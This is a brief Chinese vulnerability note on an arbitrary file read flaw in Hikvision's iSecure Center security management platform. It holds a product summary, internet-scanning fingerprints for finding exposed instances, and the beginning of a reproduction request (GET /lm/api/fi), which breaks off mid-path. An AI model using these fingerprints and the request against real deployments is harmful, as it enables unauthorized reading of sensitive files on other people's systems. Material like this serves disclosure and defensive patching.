产品简介
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、 “智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。
漏洞概述
综合安防管理平台 files 接口处存在任意文件读取漏洞,攻击者可以读取系统任意敏感文件。
网络测绘
body="/portal/common/js/" || app="HIKVISION-iSecure-Center" || body="/portal/ui/static/" || header="X-Application-Context: portal"
漏洞复现
GET /lm/api/fi